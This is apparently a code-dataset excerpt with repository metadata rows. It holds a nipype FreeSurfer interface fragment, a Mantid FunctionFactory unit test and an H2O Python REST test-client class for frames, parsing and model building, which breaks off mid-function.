out_file = File(exists=False, desc='Output label')
class SphericalAverage(FSCommand):
"""
This program will add a template into an average surface.
Examples
--------
>>> from nipype.interfaces.freesurfer import SphericalAverage
>>> sphericalavg = SphericalAverage()
>>> sphericalavg.inputs.out_file = 'test.out'
>>> sphericalavg.inputs.in_average = '.'
>>> sphericalavg.inputs.in_surf = 'lh.pial'
>>> sphericalavg.inputs.hemisphere = 'lh'
>>> sphericalavg.inputs.fname = 'lh.entorhinal'
>>> sphericalavg.inputs.which = 'label'
>>> sphericalavg.inputs.subject_id = '10335'
>>> sphericalavg.inputs.erode = 2
>>> sphericalavg.inputs.threshold = 5
>>> sphericalavg.cmdline
'mris_spherical_average -erode 2 -o 10335 -t 5.0 label lh.entorhinal lh pial . test.out'
"""
_cmd = 'mris_spherical_average'
input_spec = SphericalAverageInputSpec
output_spec = SphericalAverageOutputSpec
def _format_arg(self, name, spec, value):
if name == 'in_orig' or name == 'in_surf':
surf = os.path.basename(value)
for item in ['lh.', 'rh.']:
surf = surf.replace(item, '')
return spec.argstr % surf
return super(SphericalAverage, self)._format_arg(name, spec, value)
def _gen_filename(self, name):
if name == 'in_average':
avg_subject = self.inputs.hemisphere + '.EC_average'
avg_directory = os.path.join(self.inputs.subjects_dir, avg_subject)
if not os.path.isdir(avg_directory):
fs_home = os.path.abspath(os.environ.get('FREESURFER_HOME'))
avg_home = os.path.join(fs_home, 'subjects', 'fsaverage')
return avg_subject
elif name == 'out_file':
return self._list_outputs()[name]
else:
return None
def _list_outputs(self):
outputs = self._outputs().get()
print outputs
if isdefined(self.inputs.out_file):
outputs['out_file'] = os.path.abspath(self.inputs.out_file)
else:
out_dir = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'label')
if isdefined(self.inputs.in_average):
basename = os.path.basename(self.inputs.in_average)
basename = basename.replace('_', '_exvivo_') + '.label'
else:
basename = self.inputs.hemisphere + '.EC_exvivo_average.label'
outputs['out_file'] = os.path.join(out_dir, basename)
return outputs
|
dgellis90/nipype
|
nipype/interfaces/freesurfer/model.py
|
Python
|
bsd-3-clause
| 63,042
|
[
"Gaussian"
] |
4458a0019af6b1dd34ca8ee1c88c7745feae3ab5aeb1f716eccd4a772fbf9d22
|
from __future__ import (absolute_import, division, print_function)
import unittest
from mantid.api import IFunction1D, FunctionFactory
class TestFunction(IFunction1D):
def init(self):
pass
class FunctionFactoryTest(unittest.TestCase):
def test_get_function_factory_does_not_return_None(self):
self.assertTrue(FunctionFactory is not None)
def test_get_functions(self):
all_funcs = FunctionFactory.getFunctionNames()
self.assertTrue( len(all_funcs) > 0 )
self.assertTrue("Gaussian" in all_funcs)
def test_get_Gaussian(self):
name = "Gaussian"
func = FunctionFactory.createFunction(name)
self.assertTrue(func.name() == name)
self.assertTrue(len(func.__repr__()) > len(name))
self.assertTrue("Peak" in func.categories())
def test_function_subscription(self):
nfuncs_orig = len(FunctionFactory.getFunctionNames())
FunctionFactory.subscribe(TestFunction)
new_funcs = FunctionFactory.getFunctionNames()
self.assertEquals(nfuncs_orig+1, len(new_funcs))
self.assertTrue("TestFunction" in new_funcs)
FunctionFactory.unsubscribe("TestFunction")
new_funcs = FunctionFactory.getFunctionNames()
self.assertEquals(nfuncs_orig, len(new_funcs))
self.assertTrue("TestFunction" not in new_funcs)
if __name__ == '__main__':
unittest.main()
|
wdzhou/mantid
|
Framework/PythonInterface/test/python/mantid/api/FunctionFactoryTest.py
|
Python
|
gpl-3.0
| 1,409
|
[
"Gaussian"
] |
801ee71bd425e9068587a16d43cd7e1f228870d2931c49303364dd032cd6a28b
|
import sys, os, getpass, logging, time, inspect, requests, json, pprint
import h2o_test_utils
from h2o_test_utils import log, log_rest
import h2o_print as h2p
class H2O(object):
# static (class) variables
ipaddr_from_cmd_line = None
debugger = False
json_url_history = []
python_test_name = inspect.stack()[1][1]
verbose = False
experimental_algos = ["svd"]
## TODO: support api_version parameter for all api calls!
# Also a global in the H2O object set at creation time.
# TODO: ensure that all of this is really necessary:
def __init__(self,
use_this_ip_addr=None, port=54321, capture_output=True,
use_debugger=None, classpath=None,
use_hdfs=False, use_maprfs=False,
# hdfs_version="cdh4", hdfs_name_node="192.168.1.151",
# hdfs_version="cdh3", hdfs_name_node="192.168.1.176",
hdfs_version=None, hdfs_name_node=None, hdfs_config=None,
aws_credentials=None,
use_flatfile=False, java_heap_GB=None, java_heap_MB=None, java_extra_args=None,
use_home_for_ice=False, node_id=None, username=None,
random_udp_drop=False,
redirect_import_folder_to_s3_path=None,
redirect_import_folder_to_s3n_path=None,
disable_h2o_log=False,
enable_benchmark_log=False,
h2o_remote_buckets_root=None,
delete_keys_at_teardown=False,
cloud_name=None,
):
if use_hdfs:
# see if we can touch a 0xdata machine
try:
# long timeout in ec2...bad
a = requests.get('http://192.168.1.176:80', timeout=1)
hdfs_0xdata_visible = True
except:
hdfs_0xdata_visible = False
# different defaults, depending on where we're running
if hdfs_name_node is None:
if hdfs_0xdata_visible:
hdfs_name_node = "192.168.1.176"
else: # ec2
hdfs_name_node = "10.78.14.235:9000"
if hdfs_version is None:
if hdfs_0xdata_visible:
hdfs_version = "cdh3"
else: # ec2
hdfs_version = "0.20.2"
self.redirect_import_folder_to_s3_path = redirect_import_folder_to_s3_path
self.redirect_import_folder_to_s3n_path = redirect_import_folder_to_s3n_path
self.aws_credentials = aws_credentials
self.port = port
# None is legal for self.addr.
# means we won't give an ip to the jar when we start.
# Or we can say use use_this_ip_addr=127.0.0.1, or the known address
# if use_this_addr is None, use 127.0.0.1 for urls and json
# Command line arg 'ipaddr_from_cmd_line' dominates:
if H2O.ipaddr_from_cmd_line:
self.addr = H2O.ipaddr_from_cmd_line
else:
self.addr = use_this_ip_addr
if self.addr is not None:
self.http_addr = self.addr
else:
self.http_addr = get_ip_address()
# command line should always dominate for enabling
if H2O.debugger: use_debugger = True
self.use_debugger = use_debugger
self.classpath = classpath
self.capture_output = capture_output
self.use_hdfs = use_hdfs
self.use_maprfs = use_maprfs
self.hdfs_name_node = hdfs_name_node
self.hdfs_version = hdfs_version
self.hdfs_config = hdfs_config
self.use_flatfile = use_flatfile
self.java_heap_GB = java_heap_GB
self.java_heap_MB = java_heap_MB
self.java_extra_args = java_extra_args
self.use_home_for_ice = use_home_for_ice
self.node_id = node_id
if username:
self.username = username
else:
self.username = getpass.getuser()
# don't want multiple reports from tearDown and tearDownClass
# have nodes[0] remember (0 always exists)
self.sandbox_error_was_reported = False
self.sandbox_ignore_errors = False
self.random_udp_drop = random_udp_drop
self.disable_h2o_log = disable_h2o_log
# this dumps stats from tests, and perf stats while polling to benchmark.log
self.enable_benchmark_log = enable_benchmark_log
self.h2o_remote_buckets_root = h2o_remote_buckets_root
self.delete_keys_at_teardown = delete_keys_at_teardown
if cloud_name:
self.cloud_name = cloud_name
else:
self.cloud_name = 'pytest-%s-%s' % (getpass.getuser(), os.getpid())
'''
Printable string representation of an H2O node object.
'''
def __str__(self):
return '%s - http://%s:%d/' % (type(self), self.http_addr, self.port)
# TODO: UGH, move this.
@staticmethod
def verboseprint(*args, **kwargs):
if H2O.verbose:
for x in args: # so you don't have to create a single string
print(x),
for x in kwargs: # so you don't have to create a single string
print(x),
print
sys.stdout.flush()
def __url(self, loc, port=None):
# always use the new api port
if port is None: port = self.port
if loc.startswith('/'):
delim = ''
else:
delim = '/'
u = 'http://%s:%d%s%s' % (self.http_addr, port, delim, loc)
return u
'''
Make a REST request to the h2o server and if succesful return a dict containing the JSON result.
'''
# @profile
def __do_json_request(self, jsonRequest=None, fullUrl=None, timeout=10, params=None, postData=None, returnFast=False,
cmd='get', extraComment=None, ignoreH2oError=False, noExtraErrorCheck=False, raiseIfNon200=True, suppressErrorMsg=False, **kwargs):
H2O.verboseprint("__do_json_request, timeout: " + str(timeout))
# if url param is used, use it as full url. otherwise crate from the jsonRequest
if fullUrl:
url = fullUrl
else:
url = self.__url(jsonRequest)
# remove any params that are 'None'
# need to copy dictionary, since can't delete while iterating
if params is not None:
params_serialized = params.copy()
for k in params_serialized:
if params_serialized[k] is None:
del params[k]
paramsStr = '?' + '&'.join(['%s=%s' % (k, v) for (k, v) in params.items()])
else:
paramsStr = ''
# The requests package takes array parameters and explodes them: ['f00', 'b4r'] becomes "f00,b4r".
# NOTE: this handles 1D arrays only; if we need ND this needs to be recursive.
# NOTE: we currently don't need to do this for GET, so that's not implemented.
if postData is not None:
munged_postData = {}
for k, v in postData.iteritems():
if type(v) is list:
if len(v) == 0:
munged_postData[k] = '[]'
else:
first = True
array_str = '['
for val in v:
if not first: array_str += ', '
if val is None:
array_str += 'null'
elif isinstance(val, basestring):
array_str += "\"" + str(val) + "\""
else:
array_str += str(val)
first = False
array_str += ']'
munged_postData[k] = array_str
elif type(v) is dict:
if len(v) == 0:
munged_postData[k] = '{}'
else:
first = True
map_str = '{'
for key, val in v.iteritems():
if not first: map_str += ', '
if val is None:
map_str += "\"" + key + "\"" + ': null'
elif isinstance(val, basestring):
map_str += "\"" + str(key) + "\"" + ":" + "\"" + str(val) + "\""
else:
map_str += "\"" + key + "\"" + ':' + str(val)
first = False
map_str += '}'
munged_postData[k] = map_str
else:
# not list:
munged_postData[k] = v
else:
# None
munged_postData = postData
# print("munged_postData: " + repr(munged_postData))
if extraComment:
log('Start ' + url + paramsStr, comment=extraComment)
else:
log('Start ' + url + paramsStr)
log_rest("")
log_rest("----------------------------------------------------------------------\n")
if extraComment:
log_rest("# Extra comment info about this request: " + extraComment)
if cmd == 'get':
log_rest("GET")
else:
log_rest("POST")
log_rest(url + paramsStr)
# file get passed thru kwargs here
try:
if 'post' == cmd:
# NOTE == cmd: for now, since we don't have deserialization from JSON in h2o-dev, we use form-encoded POST.
# This is temporary.
#
# This following does application/json (aka, posting JSON in the body):
# r = requests.post(url, timeout=timeout, params=params, data=json.dumps(munged_postData), **kwargs)
#
# This does form-encoded, which doesn't allow POST of nested structures
r = requests.post(url, timeout=timeout, params=params, data=munged_postData, **kwargs)
elif 'delete' == cmd:
r = requests.delete(url, timeout=timeout, params=params, **kwargs)
elif 'get' == cmd:
r = requests.get(url, timeout=timeout, params=params, **kwargs)
else:
raise ValueError("Unknown HTTP command (expected 'get', 'post' or 'delete'): " + cmd)
except Exception as e:
# rethrow the exception after we've checked for stack trace from h2o
# out of memory errors maybe don't show up right away? so we should wait for h2o
# to get it out to h2o stdout. We don't want to rely on cloud teardown to check
# because there's no delay, and we don't want to delay all cloud teardowns by waiting.
# (this is new/experimental)
exc_info = sys.exc_info()
# use this to ignore the initial connection errors during build cloud when h2o is coming up
if not noExtraErrorCheck:
h2p.red_print(
"ERROR: got exception on %s to h2o. \nGoing to check sandbox, then rethrow.." % (url + paramsStr))
time.sleep(2)
H2O.check_sandbox_for_errors(python_test_name=H2O.python_test_name);
log_rest("")
log_rest("EXCEPTION CAUGHT DOING REQUEST: " + str(e.message))
raise (exc_info[1], None, exc_info[2])
H2O.verboseprint("r: " + repr(r))
if 200 != r.status_code:
pp = pprint.PrettyPrinter(indent=4)
msg = "JSON call returned non-200 status: " + url
json = r.json()
if None != json and 'dev_msg' in json:
msg += "\ndev_msg: "
msg += str(json['dev_msg'])
msg += "\nr.status_code: " + str(r.status_code)
msg += "\nr.headers: " + repr(r.headers)
if None == json:
msg += '\nERROR: the error output from H2O is not JSON!'
msg += "\nr.text: " + r.text
else:
msg += "\nr.json: "
msg += pp.pformat(json)
if raiseIfNon200:
pass # we'll pass msg up with the exception
elif not suppressErrorMsg:
print(msg)
log_rest(msg)
log_rest("")
try:
if r is None:
log_rest("r is None")
else:
log_rest("HTTP status code: " + str(r.status_code))
# The following accesses to r.text were taking most of the runtime:
log_text = False
if log_text:
if hasattr(r, 'text'):
if r.text is None:
log_rest("r.text is None")
else:
log_rest(r.text)
else:
log_rest("r does not have attr text")
except Exception as e:
# Paranoid exception catch.
# Ignore logging exceptions in the case that the above error checking isn't sufficient.
print("Caught exception from result logging: ", e, "; result: ", repr(r))
# fatal if no response
if raiseIfNon200 and not r:
raise Exception("Maybe bad url? no r in __do_json_request in %s:" % inspect.stack()[1][3] + "\n\n" + msg)
# this is used to open a browser on results, or to redo the operation in the browser
# we don't' have that may urls flying around, so let's keep them all
H2O.json_url_history.append(r.url)
# if r.json():
# raise Exception("Maybe bad url? no r.json in __do_json_request in %s:" % inspect.stack()[1][3])
rjson = None
if returnFast:
return
try:
rjson = r.json()
except:
print(h2o_test_utils.dump_json(r.text))
if not isinstance(r, (list, dict)):
raise Exception("h2o json responses should always be lists or dicts, see previous for text")
raise Exception("Could not decode any json from the request.")
# TODO
# TODO
# TODO
# TODO: we should really only look in the response object. This check
# prevents us from having a field called "error" (e.g., for a scoring result).
for e in ['error', 'Error', 'errors', 'Errors']:
# error can be null (python None). This happens in exec2
if e in rjson and rjson[e]:
H2O.verboseprint("rjson:" + h2o_test_utils.dump_json(rjson))
emsg = 'rjson %s in %s: %s' % (e, inspect.stack()[1][3], rjson[e])
if ignoreH2oError:
# well, we print it..so not totally ignore. test can look at rjson returned
print(emsg)
else:
print(emsg)
raise Exception(emsg)
for w in ['warning', 'Warning', 'warnings', 'Warnings']:
# warning can be null (python None).
if w in rjson and rjson[w]:
H2O.verboseprint(dump_json(rjson))
print('rjson %s in %s: %s' % (w, inspect.stack()[1][3], rjson[w]))
# Allow the caller to check things like __http_request.status_code.
# The response object is not JSON-serializable, so we capture the fields we want here:
response = {}
# response['headers'] = r.headers
response['url'] = r.url
response['status_code'] = r.status_code
response['text'] = r.text
rjson['__http_response'] = response
return rjson
# end of __do_json_request
'''
Check the output for errors. Note: false positives are possible; a whitelist is available.
'''
@staticmethod
def check_sandbox_for_errors(cloudShutdownIsError=False, sandboxIgnoreErrors=False, python_test_name=''):
# TODO: nothing right now
return
# dont' have both tearDown and tearDownClass report the same found error
# only need the first
if nodes and nodes[0].sandbox_error_report(): # gets current state
return
# Can build a cloud that ignores all sandbox things that normally fatal the test
# Kludge, test will set this directly if it wants, rather than thru build_cloud parameter.
# we need the sandbox_ignore_errors, for the test teardown_cloud..the state disappears!
ignore = sandboxIgnoreErrors or (nodes and nodes[0].sandbox_ignore_errors)
errorFound = h2o_sandbox.check_sandbox_for_errors(
LOG_DIR=LOG_DIR,
sandboxIgnoreErrors=ignore,
cloudShutdownIsError=cloudShutdownIsError,
python_test_name=python_test_name)
if errorFound and nodes:
nodes[0].sandbox_error_report(True) # sets
###################
# REST API ACCESSORS
'''
Fetch all the cluster status from the /Cloud endpoint.
'''
def cloud(self, timeoutSecs=10, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'cloud', H2O.verbose)
result = self.__do_json_request('/3/Cloud', timeout=timeoutSecs, params=params_dict)
return result
'''
Determine if the cluster status is not good. Returns a message (which evaluates as True)
if cloud status is bad; else returns None (which evluates as False);
'''
def cloud_is_bad(self, timeoutSecs=10, **kwargs):
try:
cloud = self.cloud()
except Exception as e:
return str(e)
if cloud is None:
return '/3/Cloud returned None'
if 'cloud_size' not in cloud:
return '/3/Cloud return value does not contain cloud_size'
if 'nodes' not in cloud:
return '/3/Cloud return value does not contain nodes'
if type(cloud['nodes']) is not list:
return '/3/Cloud nodes element is not a list'
if cloud['cloud_size'] < 1:
return 'cloud_size < 1: ' + cloud['cloud_size']
size = cloud['cloud_size']
if cloud['cloud_size'] != len(cloud['nodes']):
return '/3/Cloud nodes list length != cloud_size'
node_num = 0
for node in cloud['nodes']:
if 'healthy' not in node:
return '/3/Cloud node return value does not contain healthy'
if not node['healthy']:
return 'node ' + str(node_num) + ' is not healthy'
return None
'''
Fetch all the jobs or a single job from the /Jobs endpoint.
'''
def jobs(self, job_key=None, timeoutSecs=10, **kwargs):
params_dict = {
'job_key': job_key
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'jobs', H2O.verbose)
result = self.__do_json_request('/3/Jobs', timeout=timeoutSecs, params=params_dict)
return result
'''
Poll a single job from the /Jobs endpoint until it is "status": "DONE" or "CANCELLED" or "FAILED" or we time out.
'''
# TODO: add delays, etc.
def poll_job(self, job_key, timeoutSecs=10, retryDelaySecs=0.5, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'poll_job', H2O.verbose)
start_time = time.time()
while True:
H2O.verboseprint('Polling for job: ' + job_key + '. . .')
result = self.__do_json_request('/3/Jobs/' + job_key, timeout=timeoutSecs, params=params_dict)
status = result['jobs'][0]['status']
if status == 'DONE' or status == 'CANCELLED' or status == 'FAILED':
H2O.verboseprint('Job ' + status + ': ' + job_key + '.')
return result
if time.time() - start_time > timeoutSecs:
print('Job: ' + job_key + ' timed out in: ' + str(timeoutSecs) + '.')
# downstream checkers should tolerate None. Print msg in case it's overlooked.
return None
time.sleep(retryDelaySecs)
'''
Create a Frame.
'''
def create_frame(self, timeoutSecs=180, **kwargs):
a = self.__do_json_request('3/CreateFrame', cmd="post",
timeout=timeoutSecs,
params=kwargs
)
H2O.verboseprint("\ncreate_frame result:", h2o_test_utils.dump_json(a))
return a
'''
Split a Frame.
'''
def split_frame(self, timeoutSecs=180, **kwargs):
a = self.__do_json_request('/3/SplitFrame', cmd="post",
timeout=timeoutSecs,
postData=kwargs
)
job_json = self.poll_job(a["key"]["name"], timeoutSecs=timeoutSecs)
H2O.verboseprint("\nsplit_frame result:", h2o_test_utils.dump_json(a))
return a
'''
Create interactions.
'''
def interaction(self, timeoutSecs=180, **kwargs):
a = self.__do_json_request('/3/Interaction', cmd="post",
timeout=timeoutSecs,
postData=kwargs
)
H2O.verboseprint("\ninteraction result:", h2o_test_utils.dump_json(a))
return a
'''
Import a file or files into h2o. The 'file' parameter accepts a directory or a single file.
192.168.0.37:54323/ImportFiles.html?file=%2Fhome%2F0xdiag%2Fdatasets
'''
def import_files(self, path, timeoutSecs=180):
a = self.__do_json_request('/3/ImportFiles',
timeout=timeoutSecs,
params={"path": path}
)
H2O.verboseprint("\nimport_files result:", h2o_test_utils.dump_json(a))
return a
'''
Parse an imported raw file or files into a Frame.
'''
def parse(self, key, dest_key=None,
timeoutSecs=300, retryDelaySecs=0.2, initialDelaySecs=None, pollTimeoutSecs=180,
noise=None, benchmarkLogging=None, noPoll=False, **kwargs):
#
# Call ParseSetup?source_frames=[keys] . . .
#
if benchmarkLogging:
cloudPerfH2O.get_log_save(initOnly=True)
# TODO: multiple keys
parse_setup_params = {
'source_frames': '["' + key + '"]' # NOTE: quote key names
}
# h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'parse_setup', print_params=H2O.verbose)
setup_result = self.__do_json_request(jsonRequest="/3/ParseSetup", cmd='post', timeout=timeoutSecs, postData=parse_setup_params)
H2O.verboseprint("ParseSetup result:", h2o_test_utils.dump_json(setup_result))
#
# and then Parse?source_frames=<keys list> and params from the ParseSetup result
# Parse?source_frames=[nfs://Users/rpeck/Source/h2o2/smalldata/logreg/prostate.csv]&destination_frame=prostate.hex&parse_type=CSV&separator=44&number_columns=9&check_header=0&single_quotes=false&column_names=['ID',CAPSULE','AGE','RACE','DPROS','DCAPS','PSA','VOL','GLEASON]
#
parse_params = {
'source_frames': '["' + setup_result['source_frames'][0]['name'] + '"]', # TODO: cons up the whole list
'destination_frame': dest_key if dest_key else setup_result['destination_frame'],
'parse_type': setup_result['parse_type'],
'separator': setup_result['separator'],
'single_quotes': setup_result['single_quotes'],
'check_header': setup_result['check_header'],
'number_columns': setup_result['number_columns'],
'column_names': setup_result['column_names'], # gets stringified inside __do_json_request()
'column_types': setup_result['column_types'], # gets stringified inside __do_json_request()
'na_strings': setup_result['na_strings'],
'chunk_size': setup_result['chunk_size'],
}
H2O.verboseprint("parse_params: " + repr(parse_params))
h2o_test_utils.check_params_update_kwargs(parse_params, kwargs, 'parse', print_params=H2O.verbose)
parse_result = self.__do_json_request(jsonRequest="/3/Parse", cmd='post', timeout=timeoutSecs, postData=parse_params, **kwargs)
H2O.verboseprint("Parse result:", h2o_test_utils.dump_json(parse_result))
# print("Parse result:", repr(parse_result))
job_key = parse_result['job']['key']['name']
# TODO: dislike having different shapes for noPoll and poll
if noPoll:
return this.jobs(job_key)
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
if job_json:
dest_key = job_json['jobs'][0]['dest']['name']
return self.frames(dest_key)
return None
'''
Return a single Frame or all of the Frames in the h2o cluster. The
frames are contained in a list called "frames" at the top level of the
result. Currently the list is unordered.
TODO:
When find_compatible_models is implemented then the top level
dict will also contain a "models" list.
'''
def frames(self, key=None, timeoutSecs=10, **kwargs):
params_dict = {
'find_compatible_models': 0,
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'frames', H2O.verbose)
if key:
result = self.__do_json_request('/3/Frames/' + key, timeout=timeoutSecs, params=params_dict)
else:
result = self.__do_json_request('/3/Frames', timeout=timeoutSecs, params=params_dict)
return result
'''
Return the columns for a single Frame in the h2o cluster.
'''
def columns(self, key, timeoutSecs=10, **kwargs):
params_dict = {
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'columns', H2O.verbose)
result = self.__do_json_request('/3/Frames/' + key + '/columns', timeout=timeoutSecs, params=params_dict)
return result
'''
Return a single column for a single Frame in the h2o cluster.
'''
def column(self, key, column, timeoutSecs=10, **kwargs):
params_dict = {
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'column', H2O.verbose)
result = self.__do_json_request('/3/Frames/' + key + '/columns/' + column, timeout=timeoutSecs, params=params_dict)
return result
'''
Return the summary for a single column for a single Frame in the h2o cluster.
'''
def summary(self, key, column, timeoutSecs=10, **kwargs):
params_dict = {
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'summary', H2O.verbose)
result = self.__do_json_request('/3/Frames/' + key + '/columns/' + column + '/summary', timeout=timeoutSecs, params=params_dict)
return result
'''
Use Rapids to execute as.factor on the column of a Frame.
'''
def as_factor(self, key, column, timeoutSecs=60):
assert key is not None, 'FAIL: "key" parameter is null'
assert column is not None, 'FAIL: "column" parameter is null'
# quote column names; leave integer column indexes alone
if isinstance(column, basestring):
column = '"' + column + '"'
params_dict = {
'ast': "(assign {0} (:= {0} (as.factor (cols_py {0} {1})) {1} []))".format(key, column)
}
result = self.__do_json_request('/99/Rapids', cmd='post', timeout=timeoutSecs, postData=params_dict)
return result
'''
Delete a frame on the h2o cluster, given its key.
'''
def delete_frame(self, key, ignoreMissingKey=True, timeoutSecs=60, **kwargs):
assert key is not None, 'FAIL: "key" parameter is null'
result = self.__do_json_request('/3/Frames/' + key, cmd='delete', timeout=timeoutSecs)
# TODO: look for what?
if not ignoreMissingKey and 'f00b4r' in result:
raise ValueError('Frame key not found: ' + key)
return result
'''
Delete all frames on the h2o cluster.
'''
def delete_frames(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Frames', cmd='delete', timeout=timeoutSecs)
return result
'''
Return a model builder or all of the model builders known to the
h2o cluster. The model builders are contained in a dictionary
called "model_builders" at the top level of the result. The
dictionary maps algorithm names to parameters lists. Each of the
parameters contains all the metdata required by a client to
present a model building interface to the user.
'''
def model_builders(self, algo=None, timeoutSecs=10, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'model_builders', H2O.verbose)
if algo:
if algo in H2O.experimental_algos:
_rest_version = 99
else:
_rest_version = 3
result = self.__do_json_request(str(_rest_version)+'/ModelBuilders/' + algo, timeout=timeoutSecs, params=params_dict)
else:
result = self.__do_json_request('3/ModelBuilders', timeout=timeoutSecs, params=params_dict)
return result
'''
Check a dictionary of model builder parameters on the h2o cluster using the given algorithm and model parameters.
'''
def validate_model_parameters(self, algo, training_frame, parameters, timeoutSecs=60, **kwargs):
assert algo is not None, 'FAIL: "algo" parameter is null'
# Allow this now: assert training_frame is not None, '"training_frame" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
model_builders = self.model_builders(timeoutSecs=timeoutSecs)
assert model_builders is not None, "FAIL: /ModelBuilders REST call failed"
assert algo in model_builders['model_builders'], "FAIL: algo " + algo + " not found in model_builders list: " + repr(model_builders)
builder = model_builders['model_builders'][algo]
# TODO: test this assert, I don't think this is working. . .
if training_frame is not None:
frames = self.frames(key=training_frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(training_frame)
assert frames['frames'][0]['frame_id']['name'] == training_frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(training_frame, frames['frames'][0]['frame_id']['name'], training_frame)
parameters['training_frame'] = training_frame
# TODO: add parameter existence checks
# TODO: add parameter value validation
if algo in H2O.experimental_algos:
_rest_version = 99
else:
_rest_version = 3
result = self.__do_json_request('/' + str(_rest_version) + '/ModelBuilders/' + algo + "/parameters", cmd='post', timeout=timeoutSecs, postData=parameters, ignoreH2oError=True, noExtraErrorCheck=True, raiseIfNon200=False, suppressErrorMsg=True) # NOTE: DO NOT die if validation errors
H2O.verboseprint("model parameters validation: " + repr(result))
return result
'''
Build a model on the h2o cluster using the given algorithm, training
Frame and model parameters.
'''
def build_model(self, algo, training_frame, parameters, model_id = None, timeoutSecs=60, asynchronous=False, **kwargs):
# basic parameter checking
assert algo is not None, 'FAIL: "algo" parameter is null'
assert training_frame is not None, 'FAIL: "training_frame" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
# check that algo is known (TODO: remove after testing that error from POST is good enough)
model_builders = self.model_builders(timeoutSecs=timeoutSecs)
assert model_builders is not None, "FAIL: /ModelBuilders REST call failed"
assert algo in model_builders['model_builders'], "FAIL: failed to find algo " + algo + " in model_builders list: " + repr(model_builders)
builder = model_builders['model_builders'][algo]
# TODO: test this assert, I don't think this is working. . .
# Check for frame:
frames = self.frames(key=training_frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(training_frame)
assert frames['frames'][0]['frame_id']['name'] == training_frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(training_frame, frames['frames'][0]['frame_id']['name'], training_frame)
parameters['training_frame'] = training_frame
if model_id is not None:
parameters['model_id'] = model_id
result = self.__do_json_request('/3/ModelBuilders/' + algo, cmd='post', timeout=timeoutSecs, postData=parameters, raiseIfNon200=False, suppressErrorMsg=True) # NOTE: DO NOT die if validation errors
if asynchronous:
return result
elif 'error_count' in result and result['error_count'] > 0:
# parameters validation failure
return result
elif result['__http_response']['status_code'] != 200:
return result
else:
assert 'job' in result, "FAIL: did not find job key in model build result: " + repr(result)
job = result['job']
job_key = job['key']['name']
H2O.verboseprint("model building job_key: " + repr(job_key))
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
return result
'''
Build a Cartesian grid of models on the h2o cluster using the given algorithm, training Frame, model parameters and grid parameters.
The search_criteria parameter is an optional dictionary which specifies smarter hyperparameter search.
For example, if we set grid_parameters and search_criteria as follows:
{ 'ntrees': [1, 2, 4], 'distribution': ["gaussian", "poisson", "gamma", "tweedie"] }, { 'strategy': "Random", 'max_models': 5 }
5 models will be built from the 12 possible combinations.
Available search_criteria parameters are:
'strategy': 'Cartesian' (the default) or 'Random'
'max_models': an optional integer limit on the number of models
'max_time_ms': an optional limit on the total runtime, in mS
'''
def build_model_grid(self, algo, training_frame, parameters, grid_parameters, grid_id = None, timeoutSecs=60, asynchronous=False, search_criteria=None, **kwargs):
# basic parameter checking
assert algo is not None, 'FAIL: "algo" parameter is null'
assert training_frame is not None, 'FAIL: "training_frame" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
assert grid_parameters is not None, 'FAIL: "grid_parameters" parameter is null'
# check that algo is known (TODO: remove after testing that error from POST is good enough)
model_builders = self.model_builders(timeoutSecs=timeoutSecs)
assert model_builders is not None, "FAIL: /ModelBuilders REST call failed"
assert algo in model_builders['model_builders'], "FAIL: failed to find algo " + algo + " in model_builders list: " + repr(model_builders)
builder = model_builders['model_builders'][algo]
# TODO: test this assert, I don't think this is working. . .
# Check for frame:
frames = self.frames(key=training_frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(training_frame)
assert frames['frames'][0]['frame_id']['name'] == training_frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(training_frame, frames['frames'][0]['frame_id']['name'], training_frame)
parameters['training_frame'] = training_frame
# UGH: grid parameters are totally non-standard; the model parameters are mixed with grid_id and hyper_parameters. See GridSearchSchema.fillFromParms().
post_parameters = {}
post_parameters.update(parameters)
post_parameters['hyper_parameters'] = grid_parameters
# gridParams['grid_parameters'] = json.dumps(hyperParameters)
post_parameters['search_criteria'] = search_criteria
# print("post_parameters: " + repr(post_parameters))
if grid_id is not None:
post_parameters['grid_id'] = grid_id
result = self.__do_json_request('/99/Grid/' + algo, cmd='post', timeout=timeoutSecs, postData=post_parameters, raiseIfNon200=False) # NOTE: DO NOT die if validation errors
if result['__meta']['schema_type'] == 'H2OError':
print("ERROR: building model grid: " + grid_id)
print(" reason: " + result['dev_msg'])
print(" stacktrace: " + "\n ".join(result['stacktrace']))
raise ValueError("ERROR: building model grid: " + grid_id + "; reason: " + result['dev_msg'])
if asynchronous:
return result
elif 'error_count' in result and result['error_count'] > 0:
# parameters validation failure
return result
elif result['__http_response']['status_code'] != 200:
return result
else:
assert 'job' in result, "FAIL: did not find job key in model build result: " + repr(result)
job = result['job']
job_key = job['key']['name']
H2O.verboseprint("model building job_key: " + repr(job_key))
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
return result
'''
Score a model on the h2o cluster on the given Frame and return only the model metrics.
'''
def compute_model_metrics(self, model, frame, timeoutSecs=60, **kwargs):
assert model is not None, 'FAIL: "model" parameter is null'
